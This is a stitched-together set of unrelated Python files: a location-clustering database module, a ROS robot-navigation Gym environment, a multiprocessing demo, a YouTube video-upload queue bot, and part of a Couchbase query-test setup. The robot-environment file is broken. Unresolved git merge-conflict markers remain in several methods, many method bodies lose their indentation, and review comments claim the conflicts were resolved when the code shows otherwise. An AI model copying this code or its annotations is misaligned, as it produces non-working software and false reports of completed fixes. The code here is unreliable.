    timestamp = utils.timeInMillis()
    #Update every month (30 days)
    pastTS = timestamp - 30 * 24 * 60 * 60 * 1000
    t = (pastTS, maxLat, minLat, maxLng, minLng)
    c.execute("""SELECT id
                FROM locations
                WHERE timestamp >= ?
                AND latitude <= ? AND latitude >= ? AND longitude <= ? AND longitude >= ?""", t)
    # Bug fix: the original compared the *method* `c.fetchone` to None
    # (always False), so the refresh thread never ran. Call it instead.
    if c.fetchone() is None:
        #Update / get the places in a separate thread
        thread = Thread(target = placesDB.getPlacesAtPointFromGMaps, args = (conn, latitude, longitude))
        thread.start()
def postUserLocation(conn, name, token, latitude, longitude, public):
    """Insert one location sample for *name*.

    Returns 0 on success, 1 when (name, token) fails authentication.
    public: 0=hidden, 1=friends only, 2=everybody.
    """
    c = conn.cursor()
    if(userDB.authenticateUser(conn, name, token) == False):
        return 1
    #Store the location
    now = utils.timeInMillis()
    row = (name.lower(), latitude, longitude, now, public)
    c.execute("INSERT INTO locations(user, latitude, longitude, timestamp, public) VALUES (?, ?, ?, ?, ?)", row)
    conn.commit()
    # Opportunistically refresh the cached places near this position.
    storePlacesIdArroundUser(conn, latitude, longitude)
    return 0
def getUserLocationMap(conn, name, token, latitude, longitude):
    """Build the crowd map around (latitude, longitude) for user *name*.

    Clusters other users' last-30-minute positions with DBSCAN and attaches
    nearby cached places to each cluster. Returns a list of points built by
    utils.setUpPoint, or 1 when authentication fails.
    """
    #1=Wrong user
    userMap = []
    c = conn.cursor()
    if(userDB.authenticateUser(conn, name, token) == False):
        return 1
    timestamp = utils.timeInMillis()
    #Use just the last 30 minutes of data
    pastTS = timestamp - 30 * 60 * 1000
    #Get the points around aprox 1,1 km each side
    maxLat = latitude + 0.01
    minLat = latitude - 0.01
    maxLng = longitude + 0.01
    minLng = longitude - 0.01
    t = (name.lower(), pastTS, maxLat, minLat, maxLng, minLng)
    # Latest position per user (excluding the requester) inside the box.
    resultPoints = c.execute("""SELECT latitude, longitude,
                MAX(timestamp) AS timestamp
                FROM locations
                WHERE user != ? AND timestamp >= ?
                AND latitude <= ? AND latitude >= ? AND longitude <= ? AND longitude >= ?
                GROUP BY user""", t)
    # Build the "lat lat ...; lng lng ..." string literal np.matrix parses.
    # NOTE(review): with zero rows this becomes np.matrix(';'), which raises —
    # confirm callers guarantee at least one nearby user.
    latitudeStr = ''
    longitudeStr = ''
    for row in resultPoints:
        latitudeStr += ' ' + str(row[0])
        longitudeStr += ' ' + str(row[1])
    m = np.matrix(latitudeStr +';'+longitudeStr)
    dbscanResult = dbscan.dbscan(m, minDist, minPoints)
    #print('dbscan: \n'+str(dbscanResult)+'\n\n')
    # clusterPoint: (lat, lng, n) — presumably n is the cluster size, since it
    # is fed to utils.getRadius; verify against dbscan.py.
    for clusterPoint in dbscanResult:
        #print(clusterPoint)
        #Get the places arround
        radius = utils.getRadius(clusterPoint[2])
        #TODO Change the radius
        deltaRad = 0.0004 * radius #0.00001 = 1.1m
        maxLat = clusterPoint[0] + deltaRad
        minLat = clusterPoint[0] - deltaRad
        maxLng = clusterPoint[1] + deltaRad
        minLng = clusterPoint[1] - deltaRad
        t = (maxLat, minLat, maxLng, minLng)
        placesArround = c.execute("SELECT id, latitude, longitude FROM places WHERE latitude <= ? AND latitude >= ? AND longitude <= ? AND longitude >= ?", t)
        places = []
        for row in placesArround:
            #print("\t"+str(row))
            place = utils.setUpGMapPlace(row[0], row[1], row[2])
            places.append(place)
        # Only clusters with at least one known place are reported.
        if len(places) > 0 :
            point = utils.setUpPoint(clusterPoint[0], clusterPoint[1], radius, places)
            userMap.append(point)
    return userMap
def getNumUsersArround(conn, lat, lng, radius, startTimestamp, endTimestamp):
    """Count distinct users seen near (lat, lng) within a time window.

    The search box is a square of roughly 1.1 m * radius per side around the
    point; timestamps are inclusive on both ends.
    """
    c = conn.cursor()
    #1.1m * radius (0.00001 degrees is roughly 1.1 m)
    maxLat = lat + 0.00001 * radius
    minLat = lat - 0.00001 * radius
    maxLng = lng + 0.00001 * radius
    minLng = lng - 0.00001 * radius
    t = (startTimestamp, endTimestamp, maxLat, minLat, maxLng, minLng)
    users = c.execute("""SELECT user
                FROM locations
                WHERE timestamp >= ? AND timestamp <= ?
                AND latitude <= ? AND latitude >= ? AND longitude <= ? AND longitude >= ?
                GROUP BY user""", t)
    # GROUP BY yields one row per distinct user, so the row count is the answer
    # (replaces the original manual counting loop).
    return len(users.fetchall())
def getUserDistancesTest(conn):
    """Debug helper: print the distance from the first stored location to every
    other row in the locations table."""
    cursor = conn.cursor()
    rows = cursor.execute("SELECT * FROM locations")
    # The first row becomes the reference point; the loop consumes the rest.
    reference = rows.fetchone()
    for row in rows:
        dist = utils.locationDistance(reference[2], reference[3], row[2], row[3])
        print("Distance: " + str(dist))
#DEPRECATED
def getUsersArround(lat, lng, radius, startTimestamp, endTimestamp):
    """DEPRECATED: return the distinct users seen inside a ~1.1m*radius box
    around (lat, lng) between the two timestamps, using its own connection.
    Prefer getNumUsersArround / callers that pass an existing connection.
    """
    # Bug fix: sqlite3 is not imported at module level, so calling this
    # function raised NameError; a local import keeps the fix self-contained.
    import sqlite3
    conn = sqlite3.connect('database.db')
    conn.execute("PRAGMA foreign_keys = 1")
    c = conn.cursor()
    #1.1m * radius
    maxLat = lat + 0.00001 * radius
    minLat = lat - 0.00001 * radius
    maxLng = lng + 0.00001 * radius
    minLng = lng - 0.00001 * radius
    t = (startTimestamp, endTimestamp, maxLat, minLat, maxLng, minLng)
    users = c.execute("""SELECT user
                FROM locations
                WHERE timestamp >= ? AND timestamp <= ?
                AND latitude <= ? AND latitude >= ? AND longitude <= ? AND longitude >= ?
                GROUP BY user""", t)
    usersArround = []
    for row in users.fetchall():
        usersArround.append(row[0])
    conn.close()
    return usersArround
#getUserDistancesTest()
#map = getUserLocationMap("Javierd", 40.3591933, -3.6855106)
#print(map)
#postUserLocation("tvdh", 40.35141938, -3.68455186, 1504206094638)
|
rl.py
|
# NOTE(review): resolved leftover merge-conflict markers; kept the HEAD side
# so running this file directly can import sibling packages from the parent dir.
if __name__ == "__main__":
    import sys
    sys.path.append("../")
# NOTE(review): resolved leftover merge-conflict markers in this import block;
# kept the union of both sides (HEAD additionally uses Pose and Visualization).
import rospy
import time
import math
import copy
import threading
import random
import numpy as np
from abc import abstractmethod, ABC
from gym import Env, spaces
from geometry_msgs.msg import Twist, Point, Pose
from sensor_msgs.msg import LaserScan
from nav_msgs.msg import Odometry
from gazebo_msgs.msg import ModelStates, ModelState
from gazebo_msgs.srv import SetModelState
from crowdenv.networks import NNModule
from crowdenv.scenarios import Scenarios
from crowdenv.sensor_converter import ObsFilter
from crowdenv.oscillation_detector import OscillationDetect
from crowdenv.display import Visualization
class TOPICS(object):
    """Names of the ROS topics and services this environment talks to."""
    def __init__(self):
        # Laser scanner input.
        self.scan_topic = "/front/scan"
        # Gazebo world/model services and state broadcast.
        self.reset_service = '/gazebo/reset_world'
        self.set_service = '/gazebo/set_model_state'
        self.states_topic = "/gazebo/model_states"
        # Filtered odometry input.
        self.odom_topic = "odometry/filtered"
        # Velocity command output.
        self.action_topic = "/jackal_velocity_controller/cmd_vel"
class HasActionObservationSpace(ABC):
    """Interface for objects that expose gym observation/action spaces."""
    @property
    @abstractmethod
    def observation_space(self) -> spaces.Space:
        """The gym space describing observations."""
        raise NotImplementedError()
    @property
    @abstractmethod
    def action_space(self) -> spaces.Space:
        """The gym space describing actions."""
        raise NotImplementedError()
class CrowdENV(Env, HasActionObservationSpace):
def __init__(self,
scenarios_index=0,
collision_threshold=0.22,
<<<<<<< HEAD
target_threshold=0.2,
=======
target_threshold=0.8,
>>>>>>> 25ad69f87fc0158bde48b4eddcbe599de49c5edb
step_time=0.1,
max_steps=500,
random_seed=1,
vel_expanded: bool = False, # whether to use the OSC expanded Action Space or not
):
self.seed = random_seed
self.robot_name = "jackal"
self.collision_threshold = collision_threshold
self.target_threshold = target_threshold
self.start = None
self.goal = None
self.step_time = step_time
self.max_steps = max_steps
<<<<<<< HEAD
self.display = Visualization(1)
=======
>>>>>>> 25ad69f87fc0158bde48b4eddcbe599de49c5edb
self.vel_threshold = ((0., 1.), (-1., 1.))
self.vel_expanded = vel_expanded
self.scenarios = Scenarios(self.seed)
self.scenarios_index = scenarios_index
self.topics = TOPICS()
self._generate_advertisements()
self.observation_filter = ObsFilter(vel_thr=self.vel_threshold,
vel_expanded=self.vel_expanded)
cells_per_occupancy_grid: int = self.observation_filter.lidar_converter.grid_size_total
num_timesteps: int = 3
self.observation_space_ = spaces.Box(
np.array([-math.pi, 0] + [0]
+ [0] * (num_timesteps * cells_per_occupancy_grid)),
np.array([math.pi, 4] + [self.observation_filter.number_of_actions - 1]
+ [1] * (num_timesteps * cells_per_occupancy_grid))
)
self.action_space_ = spaces.Discrete(self.observation_filter.number_of_actions)
<<<<<<< HEAD
print("DEBUG: action space, observation space")
print(self.action_space)
print(self.observation_space)
# print("crowdenv: {}".format(self.vel_expanded))
=======
# print("DEBUG: action space, observation space")
# print(self.action_space)
# print(self.observation_space)
>>>>>>> 25ad69f87fc0158bde48b4eddcbe599de49c5edb
self.trajectory = []
self.position = None
self.velocity = None
self.action = None
self.reward = None
self.scan = None
self.scan_single = None
self.rel_goal = None
self.last_rel_goal = None
self.terminatec = False
self.terminateg = False
self.terminates = False
self.last_time = rospy.get_rostime().to_sec()
self.step_size = 0
self.oscillation_detector = OscillationDetect()
self.total_oscillations = 0
# self.reset()
    @property
    def observation_space(self) -> spaces.Space:
        """The fixed observation space built in __init__."""
        return self.observation_space_
    @property
    def action_space(self) -> spaces.Space:
        """The discrete action space built in __init__."""
        return self.action_space_
def reset(self, scenarios_index=None):
if scenarios_index is not None:
self.scenarios_index = scenarios_index
self.start, self.goal = self.scenarios.choose_scenarios(self.scenarios_index)
self._set_robot_srv()
self.position = None
self.velocity = None
self.action = None
self.reward = None
self.scan = None
self.scan_single = None
self.rel_goal = None
self.last_rel_goal = None
self.terminatec = False
self.terminateg = False
self.terminates = False
self.last_time = rospy.get_rostime().to_sec()
self.step_size = 0
self.total_oscillations = 0
<<<<<<< HEAD
self.display.reset()
=======
>>>>>>> 25ad69f87fc0158bde48b4eddcbe599de49c5edb
while (self.position is None) or (self.scan_single is None) or (self.velocity is None):
pass
return self.get_observation()
    def render(self, mode='human'):
        """No-op: rendering happens in Gazebo / the external visualizer."""
        pass
    def _set_robot_srv(self):
        """Teleport the robot to self.start via Gazebo's set_model_state service."""
        state_msg = ModelState()
        state_msg.model_name = self.robot_name
        state_msg.pose.position.x = self.start[0]
        state_msg.pose.position.y = self.start[1]
        # Yaw-only quaternion from the start heading self.start[2].
        state_msg.pose.orientation.z = np.sin(self.start[2] / 2)
        state_msg.pose.orientation.w = np.cos(self.start[2] / 2)
        rospy.wait_for_service(self.topics.set_service)
        try:
            set_robot = rospy.ServiceProxy(self.topics.set_service, SetModelState)
            set_robot(state_msg)
        except rospy.ServiceException as err:
            print("Service call failed: {}".format(err))
        # Give Gazebo time to apply the new pose before callbacks resume.
        rospy.sleep(0.5)
    def _generate_advertisements(self):
        """Create the ROS subscribers and the velocity publisher."""
        self.scan_subscriber = rospy.Subscriber(self.topics.scan_topic, LaserScan, self._scan_callback, queue_size=1)
        self.publisher = rospy.Publisher(self.topics.action_topic, Twist, queue_size=10)
        self.odom_subscriber = rospy.Subscriber(self.topics.odom_topic, Odometry, self._odom_callback, queue_size=1)
        self.pose_subscriber = rospy.Subscriber(self.topics.states_topic, ModelStates, self._state_callback,
                                                queue_size=1)
    def _scan_callback(self, data):
        """Cache the latest laser scan; flag a collision and stop the robot
        when any range is below collision_threshold."""
        # Column vector of ranges, shape (n_beams, 1).
        self.scan_single = np.asarray([data.ranges]).transpose()
        # print("max:{}/ min:{}".format(np.max(scan), np.min(scan)))
        min_dis_collision = self.scan_single.min()
        if min_dis_collision < self.collision_threshold:
            self.terminatec = True
            # Publish a zero Twist to halt the robot immediately.
            self.publisher.publish(Twist())
    def _odom_callback(self, data):
        """Cache the robot's current (linear.x, angular.z) velocity."""
        self.velocity = np.array([data.twist.twist.linear.x, data.twist.twist.angular.z])
def _state_callback(self, states):
for i in range(len(states.name)):
if states.name[i] == self.robot_name:
self.position = states.pose[i]
def _calculate_rel_goal(self):
robot_rel_y = self.goal[1] - self.position.position.y
robot_rel_x = self.goal[0] - self.position.position.x
distance = math.hypot(robot_rel_x, robot_rel_y)
sin_y = 2 * (self.position.orientation.w * self.position.orientation.z +
self.position.orientation.x * self.position.orientation.y)
cos_y = 1 - 2 * (self.position.orientation.y ** 2 + self.position.orientation.z ** 2)
orientation = np.arctan2(robot_rel_y, robot_rel_x) - np.arctan2(sin_y, cos_y)
if orientation > np.pi:
orientation -= 2 * np.pi
elif orientation < -np.pi:
orientation += 2 * np.pi
else:
orientation = orientation
return np.array([distance, orientation])
def _calculus_reward(self):
reward = 0
self.rel_goal = self._calculate_rel_goal()
if self.last_rel_goal is None:
self.last_rel_goal = copy.deepcopy(self.rel_goal)
if self.rel_goal[0] < self.target_threshold:
self.terminateg = True
reward += 20.
elif self.terminatec:
reward -= 20.
else:
reward = 0.2 * (self.last_rel_goal[0] - self.rel_goal[0])
self.last_rel_goal = copy.deepcopy(self.rel_goal)
return reward
def step(self, action, continuous=False):
if self.oscillation_detector.recognise(action):
self.total_oscillations += 1
# print("oscillation", end=": ")
if continuous:
action_final = action
else:
action_final = self.observation_filter.velocity_unwrapper(action)
# print("{}/{}".format(action_final[0], action_final[1]))
velocity = Twist()
velocity.linear.x = action_final[0]
velocity.angular.z = action_final[1]
while not (self.publisher.get_num_connections() > 0):
pass
self.publisher.publish(velocity)
self.step_size += 1
if self.step_size >= self.max_steps:
self.terminates = True
while rospy.get_rostime().to_sec() - self.last_time < self.step_time:
pass
self.last_time = rospy.get_rostime().to_sec()
obs, reward, done, info = self.get_observation()
<<<<<<< HEAD
# print("goal: {}; position: {}, collision:{}; terminate: {}; time_step_up:{}".format([self.goal[0], self.goal[1]],
# [self.position.position.x, self.position.position.y],
# self.terminatec, self.terminateg, self.terminates))
goal_pose = Pose()
goal_pose.position.x = self.goal[0]
goal_pose.position.y = self.goal[1]
self.display.display([self.position], [goal_pose], self.step_size)
=======
>>>>>>> 25ad69f87fc0158bde48b4eddcbe599de49c5edb
self.trajectory.append([obs,
action,
reward,
self.step_size,
self.position,
rospy.get_rostime().to_sec(),
(self.terminatec, self.terminateg)])
return obs, reward, done, info
def get_terminate(self):
return self.terminatec or self.terminateg or self.terminates
def get_observation(self):
reward = self._calculus_reward()
processed_lidar = self.observation_filter.lidar_filter(self.scan_single)
processed_vel = self.observation_filter.velocity_filter(self.velocity)
processed_goal = self.observation_filter.goal_filter(self.rel_goal)
total = np.concatenate((processed_goal, processed_vel, processed_lidar), axis=0)
yaw = math.atan2(2 * (self.position.orientation.x * self.position.orientation.y +
self.position.orientation.w * self.position.orientation.z),
self.position.orientation.w * self.position.orientation.w +
self.position.orientation.x * self.position.orientation.x -
self.position.orientation.y * self.position.orientation.y -
self.position.orientation.z * self.position.orientation.z)
<<<<<<< HEAD
=======
print(yaw)
>>>>>>> 25ad69f87fc0158bde48b4eddcbe599de49c5edb
return total, reward, self.get_terminate(), {"collision": self.terminatec,
"success": self.terminateg,
"position": [self.position.position.x, self.position.position.y,
yaw],
"total_oscillation": self.total_oscillations,
"lidar": self.scan_single}
# NOTE(review): removed an unresolved git merge-conflict marker ('<<<<<<< HEAD');
# the commented-out TrajectoryGenerator code below was kept from the HEAD side.
#
# class TrajectoryGenerator:
# def __init__(self, iterations=50):
# self.env = CrowdENV(scenarios_index=10, max_steps=100)
# self.policy = NNModule(velocity_threshold=self.env.vel_threshold, path="./", continuous=False)
# self.iterations = iterations
#
# def run(self, scenarios=range(0, 20, 1)):
# for i in scenarios:
# if i < 8:
# self.env.max_steps = 300
# elif i < 10:
# self.env.max_steps = 300
# elif i < 14:
# self.env.max_steps = 400
# elif i < 18:
# self.env.max_steps = 500
# else:
# self.env.max_steps = 800
# self.get_trajectory(i)
#
# def get_trajectory(self, scenario):
# # for i in range(steps):
# value = 0
# total_trajectories = []
#
# obs, reward, done, _ = self.env.reset(scenario)
#
# while (not rospy.is_shutdown()) and (value < self.iterations):
#
# if done:
# value += 1
# total_trajectories.append(copy.deepcopy(self.env.trajectory))
# print((self.env.terminateg, self.env.terminatec), end=" ")
# obs, reward, done, _ = self.env.reset(scenario)
# print("obs: {}, reward: {}, done: {} ".format(obs.shape, reward,
# (self.env.terminateg, self.env.terminatec)))
#
# action = self.policy.step(obs)
# obs, reward, done, _ = self.env.step(action)
# print("{},{},{}".format(self.env.step_size, reward, done))
#
# np.save("trajectory_{}".format(scenario), np.asarray(total_trajectories))
#
#
# def run_iterations():
# tg = TrajectoryGenerator(2)
# tg.run([17])
#
#
# if __name__ == "__main__":
# rospy.init_node('robot', anonymous=True)
#
# t1 = threading.Thread(target=rospy.spin)
# t2 = threading.Thread(target=run_iterations)
#
# t1.start()
# t2.start()
#
# t2.join()
# t1.join()
# NOTE(review): removed unresolved git merge-conflict markers (end of the
# conflicted region; the other branch's side was empty).
|
multi_processing.py
|
import multiprocessing
def square_mp(in_queue, out_queue):
    """Worker loop: read numbers from in_queue forever and write their squares to out_queue."""
    while True:
        value = in_queue.get()
        out_queue.put(value ** 2)
if __name__ == '__main__':
    # Demo: feed integers to the worker process one at a time and print each square.
    task_queue = multiprocessing.Queue()
    result_queue = multiprocessing.Queue()
    worker = multiprocessing.Process(target=square_mp, args=(task_queue, result_queue))
    worker.start()
    for i in range(10):
        task_queue.put(i)
        i_squared = result_queue.get()
        print(f"{i} squared is {i_squared}")
    # The worker loops forever, so it must be terminated explicitly.
    worker.terminate()
|
youtubequeue.py
|
import os
import settings
settings.generateConfigFile()
import soundfile as sf
from pydub import AudioSegment
import generatorclient
from time import sleep
from subprocess import *
import videouploader
from threading import Thread
import pickle
import datetime
from datetime import timedelta
import subprocess
import videoscript
import random
from moviepy.editor import *
# 18:00 19:00 20:00 23:00 00:00 01:00
waitTill = None
scriptIBuffer = []
def loadVideoScripts():
    """Unpickle every saved raw video script and register it with the videoscript module."""
    saved_names = os.listdir(settings.rawvideosaves)
    print(saved_names)
    for name in saved_names:
        save_path = settings.rawvideosaves + "/" + name
        with open(save_path, 'rb') as fh:
            videoscript.videoscripts.append(pickle.load(fh))
def parseScripts():
    """Validate per-genre music folders, then turn every buffered raw script into a VideoScriptEngine."""
    for musicType in generatorclient.musicTypes:
        music_dir = settings.assetPath + "/Music/%s" % musicType
        music_dir_slash = settings.assetPath + "/Music/%s/" % musicType
        if not os.path.exists(music_dir):
            print("Creating Music Path for %s: %s" % (musicType, music_dir))
            os.makedirs(music_dir)
        if len(os.listdir(music_dir_slash)) == 0:
            # Deliberate dead end: block forever until the operator adds music
            # files and restarts the bot.
            print("Music folder %s is empty! Please add mp3 files into this folder and restart the bot!" % music_dir_slash)
            while True:
                sleep(10)
                print("Music folder %s is empty! Please add mp3 files into this folder and restart the bot!" % (
                    music_dir_slash))
    if scriptIBuffer:
        for script in scriptIBuffer:
            # Buffered entries are (scriptno, title, author, ups, payload).
            scriptno, scripttitle, author, ups, payload = script[0], script[1], script[2], script[3], script[4]
            print("Parsing Raw Script %s" % scriptno)
            (final_script, videotype, video_settings, music_type, thumbnail,
             characters_amount, youtube_title, youtube_description,
             youtube_tags) = payload[:9]
            videoscript.VideoScriptEngine(scriptno, scripttitle, author, ups, final_script, videotype,
                                          video_settings, music_type, thumbnail, characters_amount,
                                          youtube_title, youtube_description, youtube_tags)
        scriptIBuffer.clear()
    else:
        print("VIDEO GENERATOR no scripts to parse")
def uploadVids():
    # Intentionally a no-op: uploading is driven from tickThread(). The
    # disabled logic below is retained for reference as a string literal.
    pass
"""
if renderedVids:
    for vid in renderedVids:
        vid.generateMovie()
    renderedVids.clear()
    loadVideoScripts()
"""
def canUpload():
    """Return how many more uploads are allowed today, or False when upload history is unknown.

    Counts the videos uploaded since the daily YouTube API quota reset and
    subtracts them from the configured uploads-per-day budget.
    """
    if generatorclient.last_upload_times is None:
        return False
    if generatorclient.last_upload_times == 0:
        # No uploads recorded at all: the whole daily budget is available.
        return settings.uploads_a_day
    now = datetime.datetime.now()
    reset_point = now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0)
    vids_within_day = 0
    for entry in generatorclient.last_upload_times:
        uploaded_at = entry[0]
        if now.hour >= settings.youtube_api_quota_reset_hour:
            if uploaded_at > reset_point:
                vids_within_day += 1
        elif uploaded_at >= now - timedelta(days=1):
            vids_within_day += 1
    print("%s Videos uploaded since %s:00" % (vids_within_day, settings.youtube_api_quota_reset_hour))
    print("Estimated quote usage %s" % (vids_within_day * 1658))
    return settings.uploads_a_day - vids_within_day
def tickThread():
    """Main scheduler loop: every 5s render pending scripts and upload as quota allows.

    Runs forever on a daemon-style worker thread started by initQueue().
    `waitTill` (module global) holds the time before which uploads are
    paused after a quota-exceeded response.
    """
    global waitTill
    while True:
        sleep(5)
        # Refresh the upload history when we have none and no request is in flight.
        if generatorclient.last_upload_times is None and not generatorclient.isRequestingScripts:
            print("No update times available... requesting more")
            generatorclient.getLastUploadedScripts()
            sleep(5)
        if videoscript.videoscripts:
            print("Rendering all video scripts...")
            for script in videoscript.videoscripts:
                script.renderVideo()
            # Clear the quota-pause once its deadline has passed.
            if waitTill is not None:
                if datetime.datetime.now() > waitTill:
                    waitTill = None
                else:
                    print("Out of Quote Response... waiting till %s" % waitTill)
            if settings.exportOffline:
                waitTill = None
            if not settings.exportOffline:
                if waitTill is None:
                    amount_to_upload = canUpload()
                    # canUpload() returns False when history is unknown, an int otherwise.
                    if type(amount_to_upload) is int:
                        scripts_available_to_upload = [script for i, script in enumerate(videoscript.videoscripts) if
                                                       script.isRendered]
                        print("Allowed to upload %s videos" % amount_to_upload)
                        if amount_to_upload > len(scripts_available_to_upload):
                            amount_to_upload = len(scripts_available_to_upload)
                            print("Only %s scripts available to upload" % amount_to_upload)
                        print("Uploading %s video scripts... %s ready to upload (total %s)" % (
                            amount_to_upload, amount_to_upload, len(videoscript.videoscripts)))
                        for i in range(0, amount_to_upload, 1):
                            upload = scripts_available_to_upload[i].uploadVideo()
                            try:
                                # uploadVideo() returning False signals quota exhaustion:
                                # pause until the next daily quota reset.
                                if upload is False:
                                    now = datetime.datetime.now()
                                    if now.hour > settings.youtube_api_quota_reset_hour:
                                        waitTill = now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0) + timedelta(days=1)
                                    else:
                                        waitTill = now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0)
                            except Exception as e:
                                print(e)
                                pass
                        # Force a refresh of the upload history next tick.
                        generatorclient.last_upload_times = None
                        # elif type(amount_to_upload) is bool:
                        #     print("Can't get last update times")
                else:
                    print("Estimated out of quotes waiting till %s" % waitTill)
        else:
            print("No video scripts, just chilling...")
            if not generatorclient.isRequestingScripts:
                generatorclient.requestScripts([script.scriptno for script in videoscript.videoscripts])
def initQueue():
    """One-time startup: create working directories, reload saved scripts, connect, and start the tick loop."""
    ## process = subprocess.call("wine /home/royalreddit/Desktop/balcon/balcon.exe -t supnerds -w /home/royalreddit/Desktop/test2.wav", shell = True)
    required_dirs = (settings.videoqueue_directory,
                     settings.rawvideosaves,
                     settings.finishedvideosdirectory,
                     f"{settings.currentPath}/TempVids")
    for directory in required_dirs:
        if not os.path.exists(directory):
            os.mkdir(directory)
    loadVideoScripts()
    generatorclient.connectToServer()
    sleep(2)
    generatorclient.requestScripts([script.scriptno for script in videoscript.videoscripts])
    worker = Thread(target=tickThread)
    worker.start()
    # uploadVids()
if __name__ == "__main__":
    # Validate credentials and TTS configuration before starting the queue.
    begin = True
    if not settings.exportOffline:
        videouploader.get_credentials()
    else:
        print("Video Generator launching in export offline mode")
    if not settings.noSpeech:
        # Exactly one TTS backend (balcon XOR google) must be enabled.
        if settings.use_balcon and settings.use_google_tts:
            print("You have selected to use both google tts and balcon tts! Please only select one in the config file!")
            begin = False
        if not settings.use_balcon and not settings.use_google_tts:
            print("You have not selected any tts options in the config file!"
                  " Please set either google tts or balcon tts to true! Not both!")
            begin = False
        if settings.use_balcon:
            # Smoke-test the balcon executable; non-zero exit means it is missing.
            command = "%s -t \"%s\" -n %s" % (settings.balcon_location,
                                              "Balcon Voice Success", settings.balcon_voice)
            process = subprocess.call(command, shell=True)
            if process != 0:
                print("Balcon not found. This will work when the following command works in your commandline: %s" % ("%s -t \"%s\" -n %s" % (settings.balcon_location,
                                                                                                                                             "Balcon Voice Test", settings.balcon_voice)))
                begin = False
    if begin:
        initQueue()
|
base_test_rqg.py
|
import paramiko
from basetestcase import BaseTestCase
import os
import zipfile
import Queue
import json
import threading
from memcached.helper.data_helper import VBucketAwareMemcached
from rqg_mysql_client import RQGMySQLClient
from membase.api.rest_client import RestConnection, Bucket
from couchbase_helper.tuq_helper import N1QLHelper
from rqg_query_helper import RQGQueryHelper
from remote.remote_util import RemoteMachineShellConnection
import random
from itertools import combinations
import shutil
from os import listdir
from os.path import isfile, join
import traceback
from rqg_postgres_client import RQGPostgresClient
from membase.api.exception import CBQError
class BaseRQGTests(BaseTestCase):
    def setUp(self):
        """Read every RQG test parameter from the test input and prepare the cluster.

        Python 2 code (note the `except Exception, ex` syntax). On any setup
        failure the test is failed immediately and teardown is attempted.
        """
        try:
            super(BaseRQGTests, self).setUp()
            self.log.info("============== RQG Setup Has Started ==============")
            self.client_map = {}
            # --- feature toggles and run-shape parameters ---
            self.check_covering_index = self.input.param("check_covering_index", True)
            self.skip_setup_cleanup = True
            self.crud_ops = self.input.param("crud_ops", False)
            self.ansi_joins = self.input.param("ansi_joins", False)
            self.with_let = self.input.param("with_let", False)
            self.ansi_transform = self.input.param("ansi_transform", False)
            self.prepared = self.input.param("prepared", False)
            self.hash_joins = self.input.param("hash_joins", False)
            self.create_secondary_meta_indexes = self.input.param("create_secondary_meta_indexes", False)
            self.aggregate_pushdown = self.input.param("aggregate_pushdown", False)
            self.create_secondary_ansi_join_indexes = self.input.param("create_secondary_ansi_join_indexes", False)
            self.remove_alias = self.input.param("remove_alias", True)
            self.skip_cleanup = self.input.param("skip_cleanup", False)
            self.build_secondary_index_in_seq = self.input.param("build_secondary_index_in_seq", False)
            self.number_of_buckets = self.input.param("number_of_buckets", 5)
            self.crud_type = self.input.param("crud_type", "update")
            self.populate_with_replay = self.input.param("populate_with_replay", False)
            self.crud_batch_size = self.input.param("crud_batch_size", 1)
            self.record_failure = self.input.param("record_failure", False)
            self.failure_record_path = self.input.param("failure_record_path", "/tmp")
            # --- backing relational database (MySQL or Postgres) ---
            self.use_mysql = self.input.param("use_mysql", False)
            self.use_postgres = self.input.param("use_postgres", False)
            self.initial_loading_to_cb = self.input.param("initial_loading_to_cb", True)
            self.change_bucket_properties = self.input.param("change_bucket_properties", False)
            self.database = self.input.param("database", "flightstats")
            self.merge_operation = self.input.param("merge_operation", False)
            self.load_copy_table = self.input.param("load_copy_table", False)
            self.user_id = self.input.param("user_id", "root")
            self.user_cluster = self.input.param("user_cluster", "Administrator")
            self.password = self.input.param("password", "")
            self.password_cluster = self.input.param("password_cluster", "password")
            self.generate_input_only = self.input.param("generate_input_only", False)
            self.using_gsi = self.input.param("using_gsi", True)
            self.reset_database = self.input.param("reset_database", True)
            self.create_primary_index = self.input.param("create_primary_index", False)
            self.create_secondary_indexes = self.input.param("create_secondary_indexes", False)
            self.use_advisor = self.input.param("use_advisor", False)
            self.items = self.input.param("items", 1000)
            # mysql_url is passed with '_' in place of '.' in test configs.
            self.mysql_url = self.input.param("mysql_url", "localhost")
            self.mysql_url = self.mysql_url.replace("_", ".")
            self.gen_secondary_indexes = self.input.param("gen_secondary_indexes", False)
            self.gen_gsi_indexes = self.input.param("gen_gsi_indexes", True)
            self.n1ql_server = self.get_nodes_from_services_map(service_type="n1ql")
            self.create_all_indexes = self.input.param("create_all_indexes", False)
            self.concurreny_count = self.input.param("concurreny_count", 10)
            self.total_queries = self.input.param("total_queries", None)
            self.run_query_without_index_hint = self.input.param("run_query_without_index_hint", True)
            self.run_query_with_primary = self.input.param("run_query_with_primary", False)
            self.run_query_with_secondary = self.input.param("run_query_with_secondary", False)
            self.run_explain_with_hints = self.input.param("run_explain_with_hints", False)
            # --- input/template files for the generated queries ---
            self.test_file_path = self.input.param("test_file_path", None)
            self.secondary_index_info_path = self.input.param("secondary_index_info_path", None)
            self.db_dump_path = self.input.param("db_dump_path", None)
            self.input_rqg_path = self.input.param("input_rqg_path", None)
            self.set_limit = self.input.param("set_limit", 0)
            self.build_index_batch_size = self.input.param("build_index_batch_size", 1000)
            self.query_count = 0
            self.use_rest = self.input.param("use_rest", True)
            self.ram_quota = self.input.param("ram_quota", 512)
            self.drop_index = self.input.param("drop_index", False)
            self.drop_bucket = self.input.param("drop_bucket", False)
            self.dynamic_indexing = self.input.param("dynamic_indexing", False)
            self.partitioned_indexes = self.input.param("partitioned_indexes", False)
            self.pushdown = self.input.param("pushdown", False)
            self.subquery = self.input.param("subquery", False)
            self.drop_secondary_indexes = self.input.param("drop_secondary_indexes", True)
            # --- helpers and cluster handles ---
            self.query_helper = self._initialize_rqg_query_helper()
            self.n1ql_helper = self._initialize_n1ql_helper()
            self.rest = RestConnection(self.master)
            self.indexer_memQuota = self.input.param("indexer_memQuota", 1024)
            # MySQL is torn down only when this run owns and resets it.
            self.teardown_mysql = self.use_mysql and self.reset_database and (not self.skip_cleanup)
            self.keyword_list = self.query_helper._read_keywords_from_file("b/resources/rqg/n1ql_info/keywords.txt")
            self.use_secondary_index = self.run_query_with_secondary or self.run_explain_with_hints
            self.check_explain_plan = self.input.param("explain_plan", False)
            self.index_limit = self.input.param("index_limit", 5)
